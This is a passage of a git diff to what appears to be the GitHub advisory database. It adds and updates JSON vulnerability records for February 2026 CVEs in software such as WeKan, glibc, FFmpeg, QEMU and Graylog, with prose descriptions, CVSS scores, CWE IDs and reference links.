], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:35Z" diff --git a/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json b/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json index 8d39404dbb3f4..fe04198c2c7f8 100644 --- a/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json +++ b/advisories/unreviewed/2026/02/GHSA-62j7-j842-x6r6/GHSA-62j7-j842-x6r6.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-62j7-j842-x6r6", - "modified": "2026-02-08T00:30:59Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-08T00:30:59Z", "aliases": [ "CVE-2026-25566" ], "details": "WeKan versions prior to 8.19 contain an authorization vulnerability in card move logic. A user can specify a destination board/list/swimlane without adequate authorization checks for the destination and without validating that destination objects belong to the destination board, potentially enabling unauthorized cross-board moves.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json b/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json new file mode 100644 index 0000000000000..57e23d8b5df16 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7qhw-4fcq-2g37", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-0577" + ], + "details": "An insufficient entropy vulnerability was found in glibc. The getrandom and arc4random family of functions may return predictable randomness if these functions are called again after the fork, which happens concurrently with a call to any of these functions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0577" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-0577" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338871" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-331" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json b/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json index afb076718911f..3ca5dad8bd323 100644 --- a/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json +++ b/advisories/unreviewed/2026/02/GHSA-844q-r72x-vfmv/GHSA-844q-r72x-vfmv.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json b/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json index 194cd692c6897..579a50df4db1c 100644 --- a/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json +++ b/advisories/unreviewed/2026/02/GHSA-86c5-9jxx-m8g7/GHSA-86c5-9jxx-m8g7.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json b/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json new file mode 100644 index 0000000000000..6b41a654786b3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gfj-223w-87pr", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70063" + ], + "details": "The 'Medical History' module in PHPGurukul Hospital Management System v4.0 contains an Insecure Direct Object Reference (IDOR) vulnerability. The application fails to verify that the requested 'viewid' parameter belongs to the currently authenticated patient. This allows a user to access the confidential medical records of other patients by iterating the 'viewid' integer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70063" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/f43c7eca5048152899e14412523afe80" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json index ecca6b38fb478..0dc8672161cf7 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json +++ b/advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8rqj-9226-cwx7", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70151" ], "details": "code-projects Scholars Tracking System 1.0 allows an authenticated attacker to achieve remote code execution via unrestricted file upload. The endpoints update_profile_picture.php and upload_picture.php store uploaded files in a web-accessible uploads/ directory using the original, user-supplied filename without validating the file type or extension. By uploading a PHP file and then requesting it from /uploads/, an attacker can execute arbitrary PHP code as the web server user.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T18:24:20Z" diff --git a/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json b/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json new file mode 100644 index 0000000000000..3fa55c8e2dcc7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9f49-2j27-6f79", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1200" + ], + "details": "A flaw was found in the rgaufman/live555 fork of live555. A remote attacker could exploit a segmentation fault, in the `increaseBufferTo` function. This vulnerability can lead to memory corruption problems and potentially other consequences.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1200" + }, + { + "type": "WEB", + "url": "https://github.com/rgaufman/live555/issues/65" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-1200" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430836" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-824" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json b/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json index 47be1da9b23a1..30dbe19657616 100644 --- a/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json +++ b/advisories/unreviewed/2026/02/GHSA-9hwv-m488-9fjx/GHSA-9hwv-m488-9fjx.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json b/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json new file mode 100644 index 0000000000000..db2e0d8360e62 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c96q-rf2r-2xj8", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-10256" + ], + "details": "A NULL pointer dereference vulnerability exists in FFmpeg’s Firequalizer filter (libavfilter/af_firequalizer.c) due to a missing check on the return value of av_malloc_array() in the config_input() function. An attacker could exploit this by tricking a victim into processing a crafted media file with the Firequalizer filter enabled, causing the application to dereference a NULL pointer and crash, leading to denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10256" + }, + { + "type": "WEB", + "url": "https://github.com/FFmpeg/FFmpeg/commit/a25462482c02c004d685a8fcf2fa63955aaa0931" + }, + { + "type": "WEB", + "url": "https://github.com/FFmpeg/FFmpeg/commit/d3be186ed1bcdcf2c093d6b13a0e66dc5132be2a" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-10256" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394495" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json index 2120594c9543c..95f34df76cffa 100644 --- a/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json +++ b/advisories/unreviewed/2026/02/GHSA-cf26-rj67-f4wr/GHSA-cf26-rj67-f4wr.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cf26-rj67-f4wr", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1441" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/index_sets/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json new file mode 100644 index 0000000000000..882b4cca10a17 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cq5p-w4x6-m6h3", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2660" + ], + "details": "A vulnerability was identified in FascinatedBox lily up to 2.3. Affected by this issue is the function shorthash_for_name of the file src/lily_symtab.c. The manipulation leads to use after free. Local access is required to approach this attack. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2660" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily/issues/385" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i385/repro.lily" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346458" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753164" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json index 4721f7998d570..23ea9e8a19226 100644 --- a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json +++ b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cw7v-qx8m-563q", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1438" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/nodes/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json index 36804edf5a62e..e433a13645a70 100644 --- a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json +++ b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ff7j-jwgr-hgxp", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1436" ], "details": "Improper Access Control (IDOR) in the Graylog API, version 2.2.3, which occurs when modifying the user ID in the URL. An authenticated user can access other user's profiles without proper authorization checks. Exploiting this vulnerability allows valid users of the system to be listed and sensitive third-party information to be accessed, such as names, email addresses, internal identifiers, and last activity. The endpoint 'http://:12900/users/' does not implement object-level authorization validations.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json b/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json new file mode 100644 index 0000000000000..eb06a5878846a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gq25-pccv-6q8j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-14876" + ], + "details": "A flaw was found in the virtio-crypto device of QEMU. A malicious guest operating system can exploit a missing length limit in the AKCIPHER path, leading to uncontrolled memory allocation. This can result in a denial of service (DoS) on the host system by causing the QEMU process to terminate unexpectedly.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14876" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14876" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2423549" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json b/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json new file mode 100644 index 0000000000000..6c56fdd48486d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gwrh-w4f9-ffc9", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2665" + ], + "details": "A vulnerability was detected in huanzi-qch base-admin up to 57a8126bb3353a004f3c7722089e3b926ea83596. Impacted is the function Upload of the file SysFileController.java of the component JSP Parser. Performing a manipulation of the argument File results in unrestricted upload. The attack can be initiated remotely. The exploit is now public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2665" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin/issues/38" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin/issues/38#issue-3905100373" + }, + { + "type": "WEB", + "url": "https://github.com/huanzi-qch/base-admin" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346462" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753240" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json b/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json new file mode 100644 index 0000000000000..cdf2eee5fadeb --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h5jq-923c-7w8g", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0874" + ], + "details": "A maliciously crafted CATPART file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0874" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json index b92de6f89b751..4101ee5427854 100644 --- a/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json +++ b/advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-89" + ], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json b/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json new file mode 100644 index 0000000000000..a8fca98bcaedc --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jx8h-vrjj-cm6g", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2667" + ], + "details": "A vulnerability has been found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. The impacted element is an unknown function of the file /dispatch/api?cmd=userinfo. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2667" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access1.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346464" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753262" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json index 6013449d93966..cfbe14db284a4 100644 --- a/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json +++ b/advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m4v3-95xp-3j5h", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70147" ], "details": "Missing authentication in /admin/student.php and /admin/teacher.php in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to obtain sensitive information (including plaintext password field values) via direct HTTP GET requests to these endpoints without a valid session.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json new file mode 100644 index 0000000000000..ae8435903a1a7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mjjq-x58m-rfxp", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2662" + ], + "details": "A weakness has been identified in FascinatedBox lily up to 2.3. This vulnerability affects the function count_transforms of the file src/lily_emitter.c. This manipulation causes out-of-bounds read. The attack can only be executed locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": 